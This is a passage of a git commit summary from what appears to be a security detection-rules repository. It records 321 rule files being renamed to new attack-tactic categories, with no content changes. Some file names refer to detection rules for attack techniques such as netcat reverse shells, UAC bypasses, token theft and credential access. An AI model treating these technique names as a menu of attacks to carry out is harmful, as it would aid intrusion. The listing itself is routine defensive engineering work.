...y_user.toml => collection_high_number_of_cloning_by_user.toml} | 0 ...b_app_deleted.toml => defense_evasion_github_app_deleted.toml} | 0 ...epo.toml => impact_github_actions_bot_first_push_to_repo.toml} | 0 ...p_installed.toml => persistence_new_github_app_installed.toml} | 0 ...orkspace_drive_encryption_key_accessed_by_anonymous_user.toml} | 0 ...dential_access_google_workspace_mfa_enforcement_disabled.toml} | 0 ... => defense_evasion_google_workspace_2sv_policy_disabled.toml} | 0 ...efense_evasion_google_workspace_password_policy_modified.toml} | 0 ...e_evasion_mfa_disabled_for_google_workspace_organization.toml} | 0 ...ecution_object_copied_to_external_drive_with_app_consent.toml} | 0 ..._google_drive_ownership_transferred_via_google_workspace.toml} | 0 ...ersistence_external_user_added_to_google_workspace_group.toml} | 0 ...l => persistence_google_workspace_suspended_user_renewed.toml} | 0 ...t.toml => defense_evasion_denied_service_account_request.toml} | 0 ...ml => discovery_forbidden_request_from_unsual_user_agent.toml} | 0 ...toml => discovery_unusual_request_response_by_user_agent.toml} | 0 ...tion_container_created_with_excessive_linux_capabilities.toml} | 0 ..._with_hostipc.toml => execution_pod_created_with_hostipc.toml} | 0 ...stnetwork.toml => execution_pod_created_with_hostnetwork.toml} | 0 ..._with_hostpid.toml => execution_pod_created_with_hostpid.toml} | 0 ... => execution_pod_created_with_sensitive_hostpath_volume.toml} | 0 ...ged_pod_created.toml => execution_privileged_pod_created.toml} | 0 ..._sensitive_rbac_change_followed_by_workload_modification.toml} | 0 ... execution_sensitive_workload_modification_by_user_agent.toml} | 0 ...tion_suspicious_assignment_of_controller_service_account.toml} | 0 ...nitial_access_exposed_service_created_with_type_nodeport.toml} | 0 ...toml => persistence_service_account_rbac_write_operation.toml} | 0 ....toml => privilege_escalation_forbidden_creation_request.toml} | 0 ...ess_args.toml => execution_ml_high_mean_rdp_process_args.toml} | 0 ...s.toml => exfiltration_ml_spike_in_remote_file_transfers.toml} | 0 ...tion.toml => collection_exchange_transport_rule_creation.toml} | 0 ...arch.toml => collection_sharepoint_sensitive_term_search.toml} | 0 ...ity_oauth_phishing_via_first_party_microsoft_application.toml} | 0 ...> credential_access_identity_unusual_sso_errors_for_user.toml} | 0 ...fense_evasion_exchange_new_or_modified_federation_domain.toml} | 0 ... => defense_evasion_exchange_transport_rule_modification.toml} | 0 ...dentity_illicit_consent_grant_via_registered_application.toml} | 0 ...ml => persistence_sharepoint_site_collection_admin_added.toml} | 0 ...=> defense_evasion_mfa_deactivation_with_no_reactivation.toml} | 0 ...oml => defense_evasion_multiple_sessions_for_single_user.toml} | 0 ...=> defense_evasion_multiple_user_agent_os_authentication.toml} | 0 ....toml => defense_evasion_okta_aitm_session_cookie_replay.toml} | 0 ...ense_evasion_okta_attempt_to_deactivate_okta_application.toml} | 0 ... defense_evasion_okta_attempt_to_modify_okta_application.toml} | 0 ...a_attempt_to_modify_or_delete_application_sign_on_policy.toml} | 0 ...ml => defense_evasion_sign_in_events_via_third_party_idp.toml} | 0 ...redentials_used_to_login_to_okta_account_after_mfa_reset.toml} | 0 ...on_successful_application_sso_from_unknown_client_device.toml} | 0 ...access.toml => defense_evasion_user_impersonation_access.toml} | 0 ...s_suspicious_okta_user_password_reset_or_unlock_attempts.toml} | 0 ...ume_of_pbpaste.toml => collection_high_volume_of_pbpaste.toml} | 0 ...granted.toml => collection_suspicious_tcc_access_granted.toml} | 0 ... => command_and_control_curl_execution_via_shell_profile.toml} | 0 ...mand_and_control_installer_package_spawned_network_event.toml} | 0 ..._and_control_scripting_osascript_exec_followed_by_netcon.toml} | 0 ...n.toml => defense_evasion_account_creation_hide_at_logon.toml} | 0 ...ense_evasion_evasion_hidden_launch_agent_deamon_creation.toml} | 0 ...t_filename.toml => defense_evasion_hidden_plist_filename.toml} | 0 ...s_sip_check.toml => defense_evasion_suspicious_sip_check.toml} | 0 ...min_privs.toml => execution_applescript_with_admin_privs.toml} | 0 ...scripting.toml => execution_explicit_creds_via_scripting.toml} | 0 ...ction.toml => execution_perl_outbound_network_connection.toml} | 0 ...toml => execution_suspicious_mac_ms_office_child_process.toml} | 0 ...on_attempt.toml => initial_access_vpn_connection_attempt.toml} | 0 ...d_to_admin.toml => persistence_local_user_added_to_admin.toml} | 0 ...gin_enabled.toml => persistence_remote_ssh_login_enabled.toml} | 0 ...crontab_filemod.toml => persistence_root_crontab_filemod.toml} | 0 ...dmin_group.toml => persistence_user_added_to_admin_group.toml} | 0 ...ript.toml => defense_evasion_ml_windows_anomalous_script.toml} | 0 ...st_linux.toml => execution_ml_rare_process_by_host_linux.toml} | 0 ...ity.toml => execution_ml_windows_anomalous_path_activity.toml} | 0 ....toml => execution_ml_windows_anomalous_process_creation.toml} | 0 ...nd_and_control_rpc_remote_procedure_call_to_the_internet.toml} | 0 ...pt.toml => execution_react_server_components_rce_attempt.toml} | 0 ...ration_smb_windows_file_sharing_activity_to_the_internet.toml} | 0 ...> initial_access_accepted_default_telnet_port_connection.toml} | 0 ...ial_access_rdp_remote_desktop_protocol_from_the_internet.toml} | 0 ...l_access_vnc_virtual_network_computing_from_the_internet.toml} | 0 ..._node.toml => reconnaissance_unsecure_elasticsearch_node.toml} | 0 ...ml => defense_evasion_endgame_cred_manipulation_detected.toml} | 0 ...l => defense_evasion_endgame_cred_manipulation_prevented.toml} | 0 ...oml => defense_evasion_endgame_permission_theft_detected.toml} | 0 ...ml => defense_evasion_endgame_permission_theft_prevented.toml} | 0 ...ml => defense_evasion_endgame_process_injection_detected.toml} | 0 ...l => defense_evasion_endgame_process_injection_prevented.toml} | 0 ...ccess_adidns_wildcard.toml => collection_adidns_wildcard.toml} | 0 ...nusual_parent.toml => collection_browsers_unusual_parent.toml} | 0 ...ess_dnsnode_creation.toml => collection_dnsnode_creation.toml} | 0 ...ig_file_access.toml => collection_web_config_file_access.toml} | 0 ...nd_and_control_command_prompt_connecting_to_the_internet.toml} | 0 ...yload.toml => command_and_control_msiexec_remote_payload.toml} | 0 ...tcat.toml => command_and_control_revshell_cmd_via_netcat.toml} | 0 ...bdav.toml => command_and_control_scripting_remote_webdav.toml} | 0 ...toml => command_and_control_suspicious_certutil_commands.toml} | 0 ...mmand_and_control_unusual_network_connection_via_dllhost.toml} | 0 ...mand_and_control_unusual_network_connection_via_rundll32.toml} | 0 ...ctions.toml => credential_access_posh_hacktool_functions.toml} | 0 ...stination.toml => credential_access_smb_rare_destination.toml} | 0 ...te_creds_pth.toml => defense_evasion_alternate_creds_pth.toml} | 0 ...bject_xwizard.toml => defense_evasion_com_object_xwizard.toml} | 0 ...dll32.toml => defense_evasion_command_shell_via_rundll32.toml} | 0 ...toml => defense_evasion_create_process_as_different_user.toml} | 0 ...toml => defense_evasion_create_process_with_token_unpriv.toml} | 0 ...l_movement_dcom_mmc20.toml => defense_evasion_dcom_mmc20.toml} | 0 ...toml => defense_evasion_delayed_via_ping_lolbas_unsigned.toml} | 0 ...ac_registry.toml => defense_evasion_disable_uac_registry.toml} | 0 ...=> defense_evasion_evasion_hidden_local_account_creation.toml} | 0 ...e_evasion_evasion_registry_startup_shell_folder_modified.toml} | 0 ... => defense_evasion_evasion_suspicious_htm_file_creation.toml} | 0 ...ver_loaded.toml => defense_evasion_expired_driver_loaded.toml} | 0 ...mcity.toml => defense_evasion_exploit_jetbrains_teamcity.toml} | 0 ...mdline.toml => defense_evasion_from_unusual_path_cmdline.toml} | 0 ..._html_help_executable_program_connecting_to_the_internet.toml} | 0 ...tion.toml => defense_evasion_krbrelayup_service_creation.toml} | 0 ...ake_token_local.toml => defense_evasion_make_token_local.toml} | 0 ...artup.toml => defense_evasion_msi_installer_task_startup.toml} | 0 ...cess.toml => defense_evasion_newcreds_logon_rare_process.toml} | 0 ...cutable.toml => defense_evasion_posh_portable_executable.toml} | 0 ...onation.toml => defense_evasion_posh_token_impersonation.toml} | 0 ...it.toml => defense_evasion_potential_webhelpdesk_exploit.toml} | 0 ...=> defense_evasion_printspooler_suspicious_file_deletion.toml} | 0 ...ed_registry.toml => defense_evasion_rdp_enabled_registry.toml} | 0 ...asion_register_server_program_connecting_to_the_internet.toml} | 0 ...cs.toml => defense_evasion_sdprop_exclusion_dsheuristics.toml} | 0 ...vices_registry.toml => defense_evasion_services_registry.toml} | 0 ...fense_evasion_suspicious_execution_from_vscode_extension.toml} | 0 ...ml => defense_evasion_suspicious_ms_office_child_process.toml} | 0 ...ous_psexesvc.toml => defense_evasion_suspicious_psexesvc.toml} | 0 ... => defense_evasion_suspicious_windows_server_update_svc.toml} | 0 ...d.toml => defense_evasion_tokenmanip_sedebugpriv_enabled.toml} | 0 ...com_clipup.toml => defense_evasion_uac_bypass_com_clipup.toml} | 0 ...ieinstal.toml => defense_evasion_uac_bypass_com_ieinstal.toml} | 0 ...l => defense_evasion_uac_bypass_com_interface_icmluautil.toml} | 0 ...ck.toml => defense_evasion_uac_bypass_diskcleanup_hijack.toml} | 0 ...ading.toml => defense_evasion_uac_bypass_dll_sideloading.toml} | 0 ...t_viewer.toml => defense_evasion_uac_bypass_event_viewer.toml} | 0 ...ck_windir.toml => defense_evasion_uac_bypass_mock_windir.toml} | 0 ...jack.toml => defense_evasion_uac_bypass_winfw_mmc_hijack.toml} | 0 ...toml => defense_evasion_unusual_parentchild_relationship.toml} | 0 ...l => defense_evasion_unusual_svchost_childproc_childless.toml} | 0 ...ve_2025_33053.toml => defense_evasion_url_cve_2025_33053.toml} | 0 ...mand.toml => defense_evasion_via_bits_job_notify_command.toml} | 0 ...html_file.toml => defense_evasion_via_compiled_html_file.toml} | 0 ...ame.toml => defense_evasion_via_hidden_run_key_valuename.toml} | 0 ...conhost.toml => defense_evasion_via_hidden_shell_conhost.toml} | 0 ...oml => defense_evasion_via_mmc_console_file_unusual_path.toml} | 0 ..._via_token_theft.toml => defense_evasion_via_token_theft.toml} | 0 ...args.toml => defense_evasion_windows_cmd_shell_susp_args.toml} | 0 ...md_ps.toml => defense_evasion_windows_fakecaptcha_cmd_ps.toml} | 0 ...rgs.toml => defense_evasion_windows_powershell_susp_args.toml} | 0 ...net.toml => defense_evasion_windows_script_from_internet.toml} | 0 ...com.toml => defense_evasion_xsl_script_execution_via_com.toml} | 0 ..._via_wmiprvse.toml => discovery_enumeration_via_wmiprvse.toml} | 0 ...teral_movement_cmd_service.toml => execution_cmd_service.toml} | 0 ...ow.toml => execution_dcom_shellwindow_shellbrowserwindow.toml} | 0 ...duled_task.toml => execution_group_policy_scheduled_task.toml} | 0 ...ral_movement_incoming_wmi.toml => execution_incoming_wmi.toml} | 0 ...il_attachment.toml => execution_rdp_file_mail_attachment.toml} | 0 ...vement_remote_services.toml => execution_remote_services.toml} | 0 ...ion_winlog.toml => execution_remote_task_creation_winlog.toml} | 0 ...uled_task_target.toml => execution_scheduled_task_target.toml} | 0 ...powershell.toml => execution_script_executing_powershell.toml} | 0 ...ia_wmi.toml => execution_scripts_process_started_via_wmi.toml} | 0 ...int.toml => execution_service_control_spawned_script_int.toml} | 0 ...=> execution_suspicious_ms_exchange_worker_child_process.toml} | 0 ...ss.toml => execution_suspicious_ms_outlook_child_process.toml} | 0 ...ml => execution_suspicious_process_access_direct_syscall.toml} | 0 ...time.toml => execution_suspicious_scheduled_task_runtime.toml} | 0 ..._process.toml => execution_suspicious_zoom_child_process.toml} | 0 ...ia_services.toml => execution_system_shells_via_services.toml} | 0 ...emp_scheduled_task.toml => execution_temp_scheduled_task.toml} | 0 ...l => execution_via_explorer_suspicious_child_parent_args.toml} | 0 ...rvices.toml => execution_via_wmi_stdregprov_run_services.toml} | 0 ...vement_via_wsus_update.toml => execution_via_wsus_update.toml} | 0 ...toml => execution_via_xp_cmdshell_mssql_stored_procedure.toml} | 0 ... => execution_volume_shadow_copy_deletion_via_powershell.toml} | 0 ...c.toml => execution_volume_shadow_copy_deletion_via_wmic.toml} | 0 ..._webshell_detection.toml => execution_webshell_detection.toml} | 0 ...t_server.toml => execution_webshell_screenconnect_server.toml} | 0 ...se_evasion_wsl_bash_exec.toml => execution_wsl_bash_exec.toml} | 0 ...oml => initial_access_account_takeover_mixed_logon_types.toml} | 0 ...t_files.toml => initial_access_downloaded_shortcut_files.toml} | 0 ...aded_url_file.toml => initial_access_downloaded_url_file.toml} | 0 ..._source_ip.toml => initial_access_takeover_new_source_ip.toml} | 0 ...dren.toml => initial_access_unusual_dns_service_children.toml} | 0 ...s.toml => initial_access_unusual_dns_service_file_writes.toml} | 0 ...r_dmsa_abuse.toml => persistence_badsuccessor_dmsa_abuse.toml} | 0 ...on_credroaming_ldap.toml => persistence_credroaming_ldap.toml} | 0 ...c_user_backdoor.toml => persistence_dcsync_user_backdoor.toml} | 0 ...l_user.toml => persistence_dmsa_creation_by_unusual_user.toml} | 0 ...elplugindll.toml => persistence_dns_serverlevelplugindll.toml} | 0 ...reation.toml => persistence_gpo_schtask_service_creation.toml} | 0 ...icy_iniscript.toml => persistence_group_policy_iniscript.toml} | 0 ...on_lsa_auth_package.toml => persistence_lsa_auth_package.toml} | 0 ...oaded_susp_dll.toml => persistence_lsass_loaded_susp_dll.toml} | 0 ...> persistence_masquerading_suspicious_werfault_childproc.toml} | 0 ..._outlook_home_page.toml => persistence_outlook_home_page.toml} | 0 ...e.toml => persistence_port_monitor_print_processor_abuse.toml} | 0 ...gepath_mod.toml => persistence_reg_service_imagepath_mod.toml} | 0 ...motemonologue.toml => persistence_regmod_remotemonologue.toml} | 0 ...ed.toml => persistence_scheduledjobs_at_protocol_enabled.toml} | 0 ...persistence_seenabledelegationprivilege_assigned_to_user.toml} | 0 ...hadow_credentials.toml => persistence_shadow_credentials.toml} | 0 ...sxs_dll.toml => persistence_shared_modules_local_sxs_dll.toml} | 0 ...bute_modified.toml => persistence_spn_attribute_modified.toml} | 0 ...t.toml => persistence_windows_service_via_unusual_client.toml} | 0 ...t.toml => collection_github_new_repo_interaction_for_pat.toml} | 0 ....toml => collection_github_new_repo_interaction_for_user.toml} | 0 ...p.toml => collection_github_repo_interaction_from_new_ip.toml} | 0 ...apability.toml => credential_access_capnetraw_capability.toml} | 0 ...ml => credential_access_okta_admin_console_login_failure.toml} | 0 ...dmin_activity.toml => defense_evasion_bitsadmin_activity.toml} | 0 ...at.toml => defense_evasion_github_new_ip_address_for_pat.toml} | 0 ...for_user.toml => defense_evasion_github_new_pat_for_user.toml} | 0 ...eration.toml => defense_evasion_linux_sysctl_enumeration.toml} | 0 ...sion.toml => defense_evasion_mdmp_file_unusual_extension.toml} | 0 ....toml => defense_evasion_settingcontent_ms_file_creation.toml} | 0 ..._abuse.toml => defense_evasion_sts_getsessiontoken_abuse.toml} | 0 ...rns.toml => execution_anomalous_rsc_flight_data_patterns.toml} | 0 .../{lateral_movement_at.toml => execution_at.toml} | 0 ...susp_extension.toml => execution_download_susp_extension.toml} | 0 ..._from_msoffice.toml => execution_injection_from_msoffice.toml} | 0 ...picious_child.toml => execution_outlook_suspicious_child.toml} | 0 ...osh_winrm_activity.toml => execution_posh_winrm_activity.toml} | 0 ..._accounts.toml => execution_unusual_process_sql_accounts.toml} | 0 ...teral_movement_wmic_remote.toml => execution_wmic_remote.toml} | 0 ...al.toml => initial_access_entra_id_risk_detection_signal.toml} | 0 ...oml => initial_access_web_server_potential_sql_injection.toml} | 0 ..._pat.toml => persistence_github_new_event_action_for_pat.toml} | 0 ...umeration.toml => persistence_linux_modprobe_enumeration.toml} | 0 ..._path_registry.toml => persistence_service_path_registry.toml} | 0 ..._services_exe_path.toml => persistence_services_exe_path.toml} | 0 ...on_write_dac_access.toml => persistence_write_dac_access.toml} | 0 ...created.toml => resource_development_github_repo_created.toml} | 0 321 files changed, 0 insertions(+), 0 deletions(-) rename rules/cross-platform/{initial_access_azure_o365_with_network_alert.toml => collection_azure_o365_with_network_alert.toml} (100%) rename rules/cross-platform/{defense_evasion_genai_process_encoding_prior_to_network_activity.toml => collection_genai_process_encoding_prior_to_network_activity.toml} (100%) rename rules/cross-platform/{discovery_virtual_machine_fingerprinting_grep.toml => defense_evasion_virtual_machine_fingerprinting_grep.toml} (100%) rename rules/cross-platform/{persistence_web_server_potential_command_injection.toml => initial_access_web_server_potential_command_injection.toml} (100%) rename rules/cross-platform/{defense_evasion_genai_config_modification.toml => persistence_genai_config_modification.toml} (100%) rename rules/cross-platform/{privilege_escalation_trap_execution.toml => persistence_trap_execution.toml} (100%) rename rules/cross-platform/{defense_evasion_genai_process_compiling_executables.toml => resource_development_genai_process_compiling_executables.toml} (100%) rename rules/integrations/aws/{exfiltration_dynamodb_scan_by_unusual_user.toml => collection_dynamodb_scan_by_unusual_user.toml} (100%) rename rules/integrations/aws/{defense_evasion_rds_instance_restored.toml => collection_rds_instance_restored.toml} (100%) rename rules/integrations/aws/{exfiltration_rds_snapshot_export.toml => collection_rds_snapshot_export.toml} (100%) rename rules/integrations/aws/{impact_aws_eventbridge_rule_disabled_or_deleted.toml => defense_evasion_aws_eventbridge_rule_disabled_or_deleted.toml} (100%) rename rules/integrations/aws/{collection_cloudtrail_logging_created.toml => defense_evasion_cloudtrail_logging_created.toml} (100%) rename rules/integrations/aws/{impact_cloudtrail_logging_updated.toml => defense_evasion_cloudtrail_logging_updated.toml} (100%) rename rules/integrations/aws/{impact_cloudwatch_log_group_deletion.toml => defense_evasion_cloudwatch_log_group_deletion.toml} (100%) rename rules/integrations/aws/{impact_cloudwatch_log_stream_deletion.toml => defense_evasion_cloudwatch_log_stream_deletion.toml} (100%) rename rules/integrations/aws/{impact_ec2_disable_ebs_encryption.toml => defense_evasion_ec2_disable_ebs_encryption.toml} (100%) rename rules/integrations/aws/{persistence_ec2_network_acl_creation.toml => defense_evasion_ec2_network_acl_creation.toml} (100%) rename rules/integrations/aws/{persistence_ec2_route_table_modified_or_deleted.toml => defense_evasion_ec2_route_table_modified_or_deleted.toml} (100%) rename rules/integrations/aws/{persistence_ec2_security_group_configuration_change_detection.toml => defense_evasion_ec2_security_group_configuration_change_detection.toml} (100%) rename rules/integrations/aws/{persistence_iam_api_calls_via_user_session_token.toml => defense_evasion_iam_api_calls_via_user_session_token.toml} (100%) rename rules/integrations/aws/{impact_iam_deactivate_mfa_device.toml => defense_evasion_iam_deactivate_mfa_device.toml} (100%) rename rules/integrations/aws/{privilege_escalation_iam_saml_provider_updated.toml => defense_evasion_iam_saml_provider_updated.toml} (100%) rename rules/integrations/aws/{persistence_lambda_backdoor_invoke_function_for_any_principal.toml => defense_evasion_lambda_backdoor_invoke_function_for_any_principal.toml} (100%) rename rules/integrations/aws/{execution_lambda_external_layer_added_to_function.toml => defense_evasion_lambda_external_layer_added_to_function.toml} (100%) rename rules/integrations/aws/{impact_rds_instance_cluster_deletion_protection_disabled.toml => defense_evasion_rds_instance_cluster_deletion_protection_disabled.toml} (100%) rename rules/integrations/aws/{persistence_rds_instance_made_public.toml => defense_evasion_rds_instance_made_public.toml} (100%) rename rules/integrations/aws/{persistence_route_53_domain_transfer_lock_disabled.toml => defense_evasion_route_53_domain_transfer_lock_disabled.toml} (100%) rename rules/integrations/aws/{persistence_route_53_hosted_zone_associated_with_a_vpc.toml => defense_evasion_route_53_hosted_zone_associated_with_a_vpc.toml} (100%) rename rules/integrations/aws/{persistence_route_table_created.toml => defense_evasion_route_table_created.toml} (100%) rename rules/integrations/aws/{exfiltration_s3_bucket_policy_added_for_public_access.toml => defense_evasion_s3_bucket_policy_added_for_public_access.toml} (100%) rename rules/integrations/aws/{impact_aws_s3_bucket_enumeration_or_brute_force.toml => discovery_aws_s3_bucket_enumeration_or_brute_force.toml} (100%) rename rules/integrations/aws/{exfiltration_ec2_full_network_packet_capture_detected.toml => discovery_ec2_full_network_packet_capture_detected.toml} (100%) rename rules/integrations/aws/{lateral_movement_sns_topic_message_publish_by_rare_user.toml => exfiltration_sns_topic_message_publish_by_rare_user.toml} (100%) rename rules/integrations/aws/{defense_evasion_s3_bucket_lifecycle_expiration_added.toml => impact_s3_bucket_lifecycle_expiration_added.toml} (100%) rename rules/integrations/aws/{resource_development_sns_topic_created_by_rare_user.toml => impact_sns_topic_created_by_rare_user.toml} (100%) rename rules/integrations/aws/{defense_evasion_sqs_purge_queue.toml => impact_sqs_purge_queue.toml} (100%) rename rules/integrations/aws/{lateral_movement_ec2_instance_console_login.toml => initial_access_ec2_instance_console_login.toml} (100%) rename rules/integrations/aws/{lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml => persistence_ec2_instance_connect_ssh_public_key_uploaded.toml} (100%) rename rules/integrations/aws/{privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml => persistence_iam_administratoraccess_policy_attached_to_group.toml} (100%) rename rules/integrations/aws/{privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml => persistence_iam_administratoraccess_policy_attached_to_role.toml} (100%) rename rules/integrations/aws/{privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml => persistence_iam_administratoraccess_policy_attached_to_user.toml} (100%) rename rules/integrations/aws/{privilege_escalation_iam_customer_managed_policy_attached_to_role.toml => persistence_iam_customer_managed_policy_attached_to_role.toml} (100%) rename rules/integrations/aws/{privilege_escalation_iam_update_assume_role_policy.toml => persistence_iam_update_assume_role_policy.toml} (100%) rename rules/integrations/aws/{credential_access_iam_user_addition_to_group.toml => persistence_iam_user_addition_to_group.toml} (100%) rename rules/integrations/aws/{exfiltration_s3_bucket_policy_added_for_external_account_access.toml => persistence_s3_bucket_policy_added_for_external_account_access.toml} (100%) rename rules/integrations/aws/{defense_evasion_sts_get_federation_token.toml => persistence_sts_get_federation_token.toml} (100%) rename rules/integrations/aws/{privilege_escalation_sts_role_chaining.toml => persistence_sts_role_chaining.toml} (100%) rename rules/integrations/aws/{persistence_iam_oidc_provider_created.toml => privilege_escalation_iam_oidc_provider_created.toml} (100%) rename rules/integrations/aws/{persistence_route_53_domain_transferred_to_another_account.toml => resource_development_route_53_domain_transferred_to_another_account.toml} (100%) rename rules/integrations/azure/{exfiltration_azure_storage_blob_download_azcopy_sas_token.toml => collection_azure_storage_blob_download_azcopy_sas_token.toml} (100%) rename rules/integrations/azure/{credential_access_key_vault_excessive_retrieval.toml => collection_key_vault_excessive_retrieval.toml} (100%) rename rules/integrations/azure/{initial_access_azure_arc_cluster_credential_access_unusual_source.toml => credential_access_azure_arc_cluster_credential_access_unusual_source.toml} (100%) rename rules/integrations/azure/{initial_access_entra_id_illicit_consent_grant_via_registered_application.toml => credential_access_entra_id_illicit_consent_grant_via_registered_application.toml} (100%) rename rules/integrations/azure/{initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml => credential_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml} (100%) rename rules/integrations/azure/{initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml => credential_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml} (100%) rename rules/integrations/azure/{initial_access_entra_id_protection_sign_in_risk_detected.toml => credential_access_entra_id_protection_sign_in_risk_detected.toml} (100%) rename rules/integrations/azure/{initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml => credential_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml} (100%) rename rules/integrations/azure/{discovery_entra_id_teamfiltration_user_agents_detected.toml => credential_access_entra_id_teamfiltration_user_agents_detected.toml} (100%) rename rules/integrations/azure/{persistence_automation_account_created.toml => defense_evasion_automation_account_created.toml} (100%) rename rules/integrations/azure/{initial_access_entra_id_actor_token_user_impersonation_abuse.toml => defense_evasion_entra_id_actor_token_user_impersonation_abuse.toml} (100%) rename rules/integrations/azure/{persistence_entra_id_conditional_access_policy_modified.toml => defense_evasion_entra_id_conditional_access_policy_modified.toml} (100%) rename rules/integrations/azure/{initial_access_entra_id_device_code_auth_with_broker_client.toml => defense_evasion_entra_id_device_code_auth_with_broker_client.toml} (100%) rename rules/integrations/azure/{initial_access_entra_id_federated_login_by_unusual_client.toml => defense_evasion_entra_id_federated_login_by_unusual_client.toml} (100%) rename rules/integrations/azure/{initial_access_entra_id_graph_single_session_from_multiple_addresses.toml => defense_evasion_entra_id_graph_single_session_from_multiple_addresses.toml} (100%) rename rules/integrations/azure/{persistence_entra_id_mfa_disabled_for_user.toml => defense_evasion_entra_id_mfa_disabled_for_user.toml} (100%) rename rules/integrations/azure/{persistence_entra_id_privileged_identity_management_role_modified.toml => defense_evasion_entra_id_privileged_identity_management_role_modified.toml} (100%) rename rules/integrations/azure/{initial_access_entra_id_rare_app_id_for_principal_auth.toml => defense_evasion_entra_id_rare_app_id_for_principal_auth.toml} (100%) rename rules/integrations/azure/{persistence_entra_id_tenant_domain_federation_via_audit_logs.toml => defense_evasion_entra_id_tenant_domain_federation_via_audit_logs.toml} (100%) rename rules/integrations/azure/{persistence_graph_eam_addition_or_modification.toml => defense_evasion_graph_eam_addition_or_modification.toml} (100%) rename rules/integrations/azure/{initial_access_graph_first_occurrence_of_client_request.toml => defense_evasion_graph_first_occurrence_of_client_request.toml} (100%) rename rules/integrations/azure/{discovery_storage_blob_container_access_modification.toml => defense_evasion_storage_blob_container_access_modification.toml} (100%) rename rules/integrations/azure/{persistence_entra_id_user_signed_in_from_unusual_device.toml => initial_access_entra_id_user_signed_in_from_unusual_device.toml} (100%) rename rules/integrations/azure/{privilege_escalation_azure_rbac_administrator_roles_assigned.toml => persistence_azure_rbac_administrator_roles_assigned.toml} (100%) rename rules/integrations/azure/{privilege_escalation_entra_id_elevate_to_user_administrator_access.toml => persistence_entra_id_elevate_to_user_administrator_access.toml} (100%) rename rules/integrations/azure/{initial_access_entra_id_external_guest_user_invite.toml => persistence_entra_id_external_guest_user_invite.toml} (100%) rename rules/integrations/azure/{privilege_escalation_kubernetes_aks_rolebinding_created.toml => persistence_kubernetes_aks_rolebinding_created.toml} (100%) rename rules/integrations/azure/{credential_access_storage_account_key_regenerated.toml => persistence_storage_account_key_regenerated.toml} (100%) rename rules/integrations/ded/{exfiltration_ml_high_bytes_destination_port.toml => command_and_control_ml_high_bytes_destination_port.toml} (100%) rename rules/integrations/gcp/{exfiltration_gcp_logging_sink_modification.toml => defense_evasion_gcp_logging_sink_modification.toml} (100%) rename rules/integrations/gcp/{persistence_gcp_iam_service_account_key_deletion.toml => impact_gcp_iam_service_account_key_deletion.toml} (100%) rename rules/integrations/gcp/{defense_evasion_gcp_pub_sub_subscription_deletion.toml => impact_gcp_pub_sub_subscription_deletion.toml} (100%) rename rules/integrations/gcp/{defense_evasion_gcp_pub_sub_topic_deletion.toml => impact_gcp_pub_sub_topic_deletion.toml} (100%) rename rules/integrations/gcp/{defense_evasion_gcp_virtual_private_cloud_network_deleted.toml => impact_gcp_virtual_private_cloud_network_deleted.toml} (100%) rename rules/integrations/gcp/{initial_access_gcp_iam_custom_role_creation.toml => persistence_gcp_iam_custom_role_creation.toml} (100%) rename rules/integrations/gcp/{defense_evasion_gcp_storage_bucket_permissions_modified.toml => persistence_gcp_storage_bucket_permissions_modified.toml} (100%) rename rules/integrations/github/{execution_github_high_number_of_cloned_repos_from_pat.toml => collection_github_high_number_of_cloned_repos_from_pat.toml} (100%) rename rules/integrations/github/{impact_github_repository_activity_from_unusual_ip.toml => collection_github_repository_activity_from_unusual_ip.toml} (100%) rename rules/integrations/github/{exfiltration_high_number_of_cloning_by_user.toml => collection_high_number_of_cloning_by_user.toml} (100%) rename rules/integrations/github/{execution_github_app_deleted.toml => defense_evasion_github_app_deleted.toml} (100%) rename rules/integrations/github/{initial_access_github_actions_bot_first_push_to_repo.toml => impact_github_actions_bot_first_push_to_repo.toml} (100%) rename rules/integrations/github/{execution_new_github_app_installed.toml => persistence_new_github_app_installed.toml} (100%) rename rules/integrations/google_workspace/{credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml => collection_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml} (100%) rename rules/integrations/google_workspace/{impact_google_workspace_mfa_enforcement_disabled.toml => credential_access_google_workspace_mfa_enforcement_disabled.toml} (100%) rename rules/integrations/google_workspace/{persistence_google_workspace_2sv_policy_disabled.toml => defense_evasion_google_workspace_2sv_policy_disabled.toml} (100%) rename rules/integrations/google_workspace/{persistence_google_workspace_password_policy_modified.toml => defense_evasion_google_workspace_password_policy_modified.toml} (100%) rename rules/integrations/google_workspace/{persistence_mfa_disabled_for_google_workspace_organization.toml => defense_evasion_mfa_disabled_for_google_workspace_organization.toml} (100%) rename rules/integrations/google_workspace/{initial_access_object_copied_to_external_drive_with_app_consent.toml => execution_object_copied_to_external_drive_with_app_consent.toml} (100%) rename rules/integrations/google_workspace/{collection_google_drive_ownership_transferred_via_google_workspace.toml => exfiltration_google_drive_ownership_transferred_via_google_workspace.toml} (100%) rename rules/integrations/google_workspace/{initial_access_external_user_added_to_google_workspace_group.toml => persistence_external_user_added_to_google_workspace_group.toml} (100%) rename rules/integrations/google_workspace/{initial_access_google_workspace_suspended_user_renewed.toml => persistence_google_workspace_suspended_user_renewed.toml} (100%) rename rules/integrations/kubernetes/{discovery_denied_service_account_request.toml => defense_evasion_denied_service_account_request.toml} (100%) rename rules/integrations/kubernetes/{execution_forbidden_request_from_unsual_user_agent.toml => discovery_forbidden_request_from_unsual_user_agent.toml} (100%) rename rules/integrations/kubernetes/{execution_unusual_request_response_by_user_agent.toml => discovery_unusual_request_response_by_user_agent.toml} (100%) rename rules/integrations/kubernetes/{privilege_escalation_container_created_with_excessive_linux_capabilities.toml => execution_container_created_with_excessive_linux_capabilities.toml} (100%) rename rules/integrations/kubernetes/{privilege_escalation_pod_created_with_hostipc.toml => execution_pod_created_with_hostipc.toml} (100%) rename rules/integrations/kubernetes/{privilege_escalation_pod_created_with_hostnetwork.toml => execution_pod_created_with_hostnetwork.toml} (100%) rename rules/integrations/kubernetes/{privilege_escalation_pod_created_with_hostpid.toml => 